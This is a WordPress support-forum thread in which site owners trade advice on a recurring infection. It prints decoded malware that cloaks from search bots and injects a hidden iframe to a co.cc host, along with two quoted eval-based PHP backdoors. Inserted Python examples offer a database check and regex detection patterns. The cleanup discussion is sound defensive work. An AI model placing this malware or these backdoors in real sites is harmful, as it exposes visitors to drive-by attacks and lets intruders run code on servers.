
Malicious code in index.php keeps coming back (13 posts)

  1. nerdalertmarketing
    Member
    Posted 3 years ago #

    Don't know if this is the right section but I really need some help:

    A couple of days back a site of mine was hacked (don't know how) and my index file was modified with some code that modifies the header. I don't know exactly what it does because my AVG blocked the attack locally. I ran a virus scan in cPanel and removed the code. Virus scan came up clean. I reset my cPanel password, FTP password and WordPress password. I also installed the Secure WordPress plugin (wish I would have done that initially) and everything seemed OK... but after a day I went and checked the site again and the code was back. It was right back in the index file again. This time I copied it and it decodes to this:

    error_reporting(0);
    $bot = FALSE ;
    $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
    $stop_ips_masks = array(
    	array("216.239.32.0","216.239.63.255"),
    	array("64.68.80.0"  ,"64.68.87.255"  ),
    	array("66.102.0.0",  "66.102.15.255"),
    	array("64.233.160.0","64.233.191.255"),
    	array("66.249.64.0", "66.249.95.255"),
    	array("72.14.192.0", "72.14.255.255"),
    	array("209.85.128.0","209.85.255.255"),
    	array("198.108.100.192","198.108.100.207"),
    	array("173.194.0.0","173.194.255.255"),
    	array("216.33.229.144","216.33.229.151"),
    	array("216.33.229.160","216.33.229.167"),
    	array("209.185.108.128","209.185.108.255"),
    	array("216.109.75.80","216.109.75.95"),
    	array("64.68.88.0","64.68.95.255"),
    	array("64.68.64.64","64.68.64.127"),
    	array("64.41.221.192","64.41.221.207"),
    	array("74.125.0.0","74.125.255.255"),
    	array("65.52.0.0","65.55.255.255"),
    	array("74.6.0.0","74.6.255.255"),
    	array("67.195.0.0","67.195.255.255"),
    	array("72.30.0.0","72.30.255.255"),
    	array("38.0.0.0","38.255.255.255")
    	);
    $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
    foreach ( $stop_ips_masks as $IPs ) {
    	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
    }
    foreach ($user_agent_to_filter as $bot_sign){
    	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
    }
    if (!$bot) {
    echo '<iframe src="http://gb3hnh3nf.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
    }

    I have asked my host to help but they can't do much other than suggest a reinstall, but I don't want to lose all my data.

    What can I do here? There is obviously some additional code corrupting my WP install but I don't know where to look or how to remove it.

    Anyone ever encounter something like this? Can anyone help me out?

  2. Samuel B
    moderator
    Posted 3 years ago #

  3. creatorul
    Member
    Posted 3 years ago #

    I have the same problem and I haven't found an answer. Did you manage to remove it? Mine is returning and infects all the sites on my shared hosting.

    eval(base64_decode('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'));

    This is inserted in every index.php file, and for the index.html it only inserts the iframe with a link to the co.cc site after the <body> tag.
    My conclusions so far:

    1. It is not the hosting - I checked other sites from other hosting accounts on the same server and they are fine. Only all my sites from my account have the virus.
    2. Scanned my computers several times; it can't be from there. I've changed all passwords: FTP, cPanel, WordPress, and even upgraded WordPress to the latest version and it still gets infected.
    3. Can't be via FTP... I've checked FTP logs and everything is clean, only what I modified manually. Also I have other FTP accounts saved in TotalCommander and they are untouched.

    Before infection:
    -rw-r--r-- 1 creato creato 398 Mar 1 05:29 index.php
    After:
    -rw-r--r-- 1 creato creato 3083 Mar 1 05:29 index.php

    As you can see, the date of modification doesn't change.
    It must be a WordPress hack which gives it access to my whole shared hosting account, thus infecting all other sites (WordPress or not). I only have WordPress installed and some static sites, so there must be a backdoor I can't find.

    Thanks

  4. nerdalertmarketing
    Member
    Posted 3 years ago #

    I fixed it by moving the add-ons to their own cPanel and re-installing everything... but I don't think I needed to go that far. After I moved I found that the hack was done with the permalink structure somehow... when I moved to a new cPanel account, all my links were broken and going to a 404 page... which was due to the framing sending it elsewhere. Anyway, I just changed the permalink structure to standard, and then back to the custom setup I had, and that fixed everything. So try just changing and re-saving the permalinks before you do any sort of re-install or migration or anything. Let me know if that works.

    Mine is clean finally.

  5. creatorul
    Member
    Posted 3 years ago #

    The sad thing is that I don't have any backup, so I must work on removing their backdoor somehow but I can't seem to find it.
    I have a few sites with WordPress, one with ArticleMS and some plain sites.
    Do you have other CMSes besides WordPress? Which version of WordPress? Trying to narrow down the hackable one.

    Thx

  6. creatorul
    Member
    Posted 3 years ago #

    Help :(

  7. tanira
    Member
    Posted 3 years ago #

    It can be your .htaccess file or the CHMOD permissions of your folders. This topic can help: http://wordpress.org/support/topic/file-permission-chmod-help-htaccess-and-wp-content?replies=7

    And my .htaccess file is fine with:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

  8. nerdalertmarketing
    Member
    Posted 3 years ago #

    I'm afraid I have nothing more to add. Moving the site from one cPanel account to another (basically re-installing) worked for me. I don't know enough about it to be able to offer more advice. Best of luck... I feel your pain.

  9. creatorul
    Member
    Posted 3 years ago #

    Thank you everyone for the tips.
    You can find the answer in this article:
    http://blog.unmaskparasites.com/2011/03/02/versatile-cc-attacks/
    That's a very good article and the author is covering all possible backdoor locations.

    Have a good day, virus-free

  10. studiochris
    Member
    Posted 3 years ago #

    I just cleaned up one of these for a client, and I think I got it all...

    Check your database for a user called "WordPress.Org". It won't show up in wp-admin because it was placed by an SQL injection or something and the first name is set to a bit of JavaScript that executes and removes all traces of the user on the Users page. Be sure to clean both wp_users and wp_usermeta in the database.

    Next, check Appearance > Custom Header and delete the currently set header(s). In the account I cleaned up, the main backdoor was the uploaded header, presumably set by the fake admin. It was a duplicate of the site's real header image and set by CSS, so it was essentially invisible.

    Go through all of the main index.php files in your hosting account... domains, subdomains, other software packages -- it doesn't matter -- and delete the base64 encoded PHP at the top of the file. If you don't delete the script-filled image first, if anyone visits the site and downloads the image, the base64 bit will be injected into index.php again and the iframe will come back.

    Good luck.
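    A direct database check for that hidden user, as an added example that is not code from this thread or from WordPress: it runs the lookup and the two-table cleanup against an in-memory SQLite copy of wp_users and wp_usermeta built from constructed rows (the wp_ prefix and the reduced column set are assumptions; on a live site issue the same SELECT and DELETEs against MySQL after taking a dump).

    ```python
    import sqlite3

    SCHEMA = """
    CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                           user_email TEXT, display_name TEXT);
    CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                              meta_key TEXT, meta_value TEXT);
    """
    # Constructed sample data: one real admin and one rogue user whose first_name
    # holds script, which is how the post says the row hides itself in wp-admin.
    SAMPLE_ROWS = [
        (1, "admin", "admin@example.com", "admin",
         {"first_name": "Site", "nickname": "admin",
          "wp_capabilities": 'a:1:{s:13:"administrator";b:1;}'}),
        (2, "WordPress.Org", "wp@example.com", "WordPress.Org",
         {"first_name": "<script>/* hides this row in wp-admin */</script>",
          "nickname": "WordPress.Org",
          "wp_capabilities": 'a:1:{s:13:"administrator";b:1;}'}),
    ]

    def open_sample_db():
        """In-memory SQLite stand-in for the two MySQL tables, loaded with SAMPLE_ROWS."""
        conn = sqlite3.connect(":memory:")
        conn.executescript(SCHEMA)
        for uid, login, email, display, meta in SAMPLE_ROWS:
            conn.execute("INSERT INTO wp_users VALUES (?, ?, ?, ?)", (uid, login, email, display))
            for key, value in meta.items():
                conn.execute("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
                             (uid, key, value))
        return conn

    def find_rogue_users(conn):
        """(ID, user_login) of users matching the reported login, or whose profile
        meta contains markup (a genuine first/last name or nickname never does)."""
        sql = """
        SELECT DISTINCT u.ID, u.user_login FROM wp_users u
        LEFT JOIN wp_usermeta m ON m.user_id = u.ID
          AND m.meta_key IN ('first_name', 'last_name', 'nickname', 'description')
        WHERE u.user_login = 'WordPress.Org' OR m.meta_value LIKE '%<%'
        ORDER BY u.ID"""
        return conn.execute(sql).fetchall()

    def remove_user(conn, user_id):
        """Delete from both tables, as the post says; returns rows removed per table."""
        meta = conn.execute("DELETE FROM wp_usermeta WHERE user_id = ?", (user_id,)).rowcount
        users = conn.execute("DELETE FROM wp_users WHERE ID = ?", (user_id,)).rowcount
        conn.commit()
        return {"wp_users": users, "wp_usermeta": meta}
    ```
    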

  11. Daniel Cid
    Member
    Posted 3 years ago #

    This is the malware you have:
    http://blog.sucuri.net/2011/02/the-attack-from-the-ccs-domains-considered-harmful.html

    And it also comes together with a backdoor hidden in your themes. So search on all your themes files for:

    if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

    *That's the backdoor associated with this malware.
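    Added example (not code from the thread or from either linked article) that walks a hosting-account tree for the two file-level indicators named in the two posts above: the base64-wrapped eval at the top of index.php files, and the $_REQUEST['asc'] eval backdoor in theme files. The sample tree, its site and theme names, and the base64 payload placeholder are constructed; point scan_tree() at your real document root.

    ```python
    import os
    import re
    import tempfile

    INDICATORS = {  # regexes for the two indicators quoted in the thread
        "base64_eval": re.compile(r"eval\s*\(\s*base64_decode\s*\("),  # top of index.php
        "request_eval_backdoor": re.compile(  # theme-file backdoor from post 11
            r"isset\s*\(\s*\$_REQUEST\s*\[\s*['\"]asc['\"]\s*\]\s*\)\s*\)\s*eval\s*\("),
    }

    def scan_file(path):
        """Return [(indicator_name, line_number), ...] for one file."""
        with open(path, "rb") as fh:
            text = fh.read().decode("utf-8", errors="replace")
        hits = []
        for name, rx in INDICATORS.items():
            for m in rx.finditer(text):
                hits.append((name, text.count("\n", 0, m.start()) + 1))
        return hits

    def scan_tree(root):
        """Map of relative path -> hits for every .php file under root that has a hit."""
        findings = {}
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                if fname.endswith(".php"):
                    full = os.path.join(dirpath, fname)
                    hits = scan_file(full)
                    if hits:
                        findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
        return findings

    # Constructed sample tree: site1 is clean, site2 carries both indicators.
    SAMPLE_FILES = {
        "site1/index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n",
        "site2/index.php": "<?php eval(base64_decode('PAYLOAD_PLACEHOLDER')); ?><?php\n"
                           "define('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n",
        "site2/wp-content/themes/twentyten/functions.php":
            "<?php\n// theme code...\nif (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n",
    }

    def build_sample_tree():
        """Write SAMPLE_FILES into a fresh temp dir and return its root."""
        root = tempfile.mkdtemp(prefix="wp-scan-")
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(body)
        return root
    ```
    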

  12. Dil
    Member
    Posted 2 years ago #

    Hey... I do have the same problem. Don't have access to the cPanel; is there any other way to do it?

    The code that is appearing on the top:

    if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['5db4c956bb56f6f050412fecd239344f']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslashes($_REQUEST['HOST']));}

    Please view the site here - http://www.iphindia.org

  13. Dil
    Member
    Posted 2 years ago #

    Had to reinstall WordPress.

Topic Closed

This topic has been closed to new replies.
